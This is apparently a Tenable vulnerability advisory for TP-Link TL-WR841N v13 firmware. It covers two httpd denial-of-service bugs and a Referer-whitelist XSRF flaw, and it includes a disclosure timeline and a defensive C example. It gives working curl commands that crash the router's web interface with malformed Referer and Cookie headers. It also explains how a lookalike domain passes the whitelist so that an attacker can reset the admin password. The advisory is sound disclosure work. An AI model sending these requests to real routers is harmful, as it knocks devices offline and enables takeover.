
[R1] TP-Link TL-WR841N Multiple Vulnerabilities

Critical

Synopsis

Tenable was recently investigating TP-Link's TL-WR841N v13 using firmware 0.9.1 4.16 v0348.0 (listed as TL-WR841N(US)_V13_180119 on the download page). As a result, Tenable found multiple vulnerabilities.

CVE-2018-15700: httpd Denial of Service via Referer Header

A locally connected user sending an HTTP request whose "Referer" field lacks the protocol string will cause the httpd service to terminate. We believe this is a NULL pointer dereference in the http_parser_main function. The problem starts with a memcmp looking for "http://" in the first seven bytes of the "Referer" field. Only if this comparison succeeds is a "Referer" string variable initialized. When the memcmp fails, program flow still continues and attempts string operations on the uninitialized NULL string. The resulting crash requires a router reboot to revive the httpd web interface.

curl 'http://tplinkwifi.net/' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: DOS' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' --compressed

CVE-2018-15701: httpd Denial of Service via Cookie Header

Crafting an HTTP request with an HTTP "Cookie" field of "Authorization;" will result in the httpd service terminating. Again, a router reboot is required to revive the web interface. We believe this is another parsing error in "http_parser_main".

curl 'http://tplinkwifi.net/' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://tplinkwifi.net/' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' -H 'Cookie: Authorization;' --compressed

CVE-2018-15702: XSRF due to Incomplete Referer Check

In the http_parser_main function, referer whitelisting is accomplished using strncmp with a length field derived from the "tplinklogin.net", "tplinkwifi.net", or router IP strings. Since strncmp only compares the first few characters of the referer domain string, an attacker can pass this check by crafting a domain or subdomain of the form "tplinklogin.net*", "tplinkwifi.net*", or "<router's IP>*".

This issue is magnified in severity by a previously disclosed but unpatched authentication bypass vulnerability (CVE-2018-11714). Together they allow a remote attacker to perform XSRF against various sensitive cgi scripts. A remote attacker is able to enable remote management and reset the router admin password.
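The two parsing defects above (the NULL "Referer" string in CVE-2018-15700 and the length-limited strncmp whitelist in CVE-2018-15702) share one root: the Referer host is never isolated and validated as a whole. The following C code is an added example written for this advisory, not TP-Link's firmware code or Tenable's proof of concept; the allow-list, the router IP 192.168.0.1 and the sample Referer values are all constructed. It places the flawed prefix check next to a parser that fails closed on a missing scheme and compares the full host.

```c
/* Added example: Referer allow-list handling that avoids both defects
 * described for http_parser_main. Not the router's real code. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define HOST_MAX 256

/* Hosts the router UI is legitimately served from. The IP is an assumed
 * value for illustration only. */
static const char *const allowed_hosts[] = {
    "tplinklogin.net",
    "tplinkwifi.net",
    "192.168.0.1"
};
#define N_ALLOWED (sizeof allowed_hosts / sizeof allowed_hosts[0])

/* The flawed pattern (CVE-2018-15702): strncmp bounded by the length of the
 * allow-list entry, so any host that merely begins with an entry passes.
 * Kept here only for contrast with referer_allowed_exact(). */
int referer_allowed_prefix(const char *referer)
{
    const char *p = referer;
    if (p == NULL)
        return 0;
    if (strncmp(p, "http://", 7) == 0)
        p += 7;                      /* skip the scheme if present */
    for (size_t i = 0; i < N_ALLOWED; i++)
        if (strncmp(p, allowed_hosts[i], strlen(allowed_hosts[i])) == 0)
            return 1;
    return 0;
}

/* Copy the lowercased host part of a Referer URL into out.
 * Returns 0 on success and -1 on any malformed input. The buffer is
 * initialised before the scheme check, so a Referer without "http://"
 * (the CVE-2018-15700 trigger) yields an error code, not a NULL string. */
int referer_host(const char *referer, char *out, size_t outlen)
{
    const char *p;
    size_t n;

    if (out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    if (referer == NULL)
        return -1;

    if (strncmp(referer, "http://", 7) == 0)
        p = referer + 7;
    else if (strncmp(referer, "https://", 8) == 0)
        p = referer + 8;
    else
        return -1;                   /* e.g. "Referer: DOS" ends here */

    /* Host ends at the first '/', ':', '?' or '#'. Reject empty or
     * overlong hosts and any userinfo ('@'), which a browser never sends
     * for the router UI. */
    n = strcspn(p, "/:?#");
    if (n == 0 || n >= outlen || memchr(p, '@', n) != NULL)
        return -1;
    for (size_t i = 0; i < n; i++)
        out[i] = (char)tolower((unsigned char)p[i]);
    out[n] = '\0';
    return 0;
}

/* Correct check: exact, case-insensitive match of the whole host; any
 * parse failure is a denial rather than a crash. */
int referer_allowed_exact(const char *referer)
{
    char host[HOST_MAX];
    if (referer_host(referer, host, sizeof host) != 0)
        return 0;
    for (size_t i = 0; i < N_ALLOWED; i++)
        if (strcasecmp(host, allowed_hosts[i]) == 0)
            return 1;
    return 0;
}

int main(void)
{
    /* Constructed Referer values: legitimate, lookalike, and scheme-less. */
    const char *samples[] = {
        "http://tplinkwifi.net/", "http://tplinkwifi.net.example/", "DOS"
    };
    for (size_t i = 0; i < 3; i++)
        printf("%-32s prefix=%d exact=%d\n", samples[i],
               referer_allowed_prefix(samples[i]),
               referer_allowed_exact(samples[i]));
    return 0;
}
```

The lookalike host passes the prefix check and is rejected by the exact check, while the scheme-less value is simply denied; the difference between "terminates httpd" and "returns 0" is the whole fix for the first CVE.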

Solution

Currently no solution exists. At time of publication, the most recent firmware version on TP-Link's website is listed as TL-WR841N(US)_V13_180119 which is the vulnerable firmware version (0.9.1 4.16 v0348.0).

Disclosure Timeline

07-02-2018 - Tenable sends vulnerability write up and proof of concepts to TP-Link.
07-18-2018 - Tenable asks TP-Link for acknowledgement.
07-18-2018 - TP-Link says all the bugs are already fixed and suggests Tenable verify using the latest firmware.
07-27-2018 - Tenable confirms the vulnerabilities still exist in the latest build (0.9.1 4.16 v0348.0 Build 180119 Rel 66498n). Tenable asks if there is a more recent unpublished build.
07-27-2018 - TP-Link says they will check the firmware and let Tenable know.
08-27-2018 - Tenable asks for an update.
08-27-2018 - TP-Link asks for hardware version and firmware version.
08-27-2018 - Tenable responds TL-WR841N V13 0.9.1 4.16 v0348.0 Build 180119 Rel 66498n
08-27-2018 - TP-Link sends a beta firmware for Tenable to test.
08-27-2018 - TP-Link follows up that they hope for feedback ASAP.
08-27-2018 - Tenable can't download the rar attachment via email.
08-27-2018 - TP-Link suggests using WeTransfer.
08-27-2018 - Tenable agrees.
08-30-2018 - Tenable asks TP-Link for an update.
08-30-2018 - TP-Link says they sent a WeTransfer. They'll try again.
08-30-2018 - Tenable confirms receipt of the firmware (0.9.1 4.16 v0348.0 Build 180821 Rel.42708n(Beta)) and confirms that two vulnerabilities still exist.
08-30-2018 - TP-Link notifies Tenable of another WeTransfer.
08-30-2018 - Tenable informs TP-Link that they sent the exact same firmware as before.
09-20-2018 - Tenable asks TP-Link for an update.
09-20-2018 - TP-Link says they already sent the beta version.
09-20-2018 - Tenable says they haven't received anything new.
09-20-2018 - TP-Link says WeTransfer informed them that Tenable downloaded the firmware. Asks Tenable for an email address that doesn't block rar files.
09-20-2018 - Tenable reiterates that the last downloaded version was vulnerable. Tenable asks for a new version via WeTransfer.
10-01-2018 - Tenable reminds TP-Link that today is the 90 day disclosure day.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2018-27
Credit:
David Wells
CVSSv2 Base / Temporal Score:
9.3/7.5
CVSSv2 Vector:
AV:N/AC:M/Au:N/C:C/I:C/A:C
Nessus Plugin ID: 117861
Affected Products:
TL-WR841N v13 0.9.1 4.16 v0348.0
Risk Factor:
Critical

Advisory Timeline

10-01-2018 - [R1] Initial Release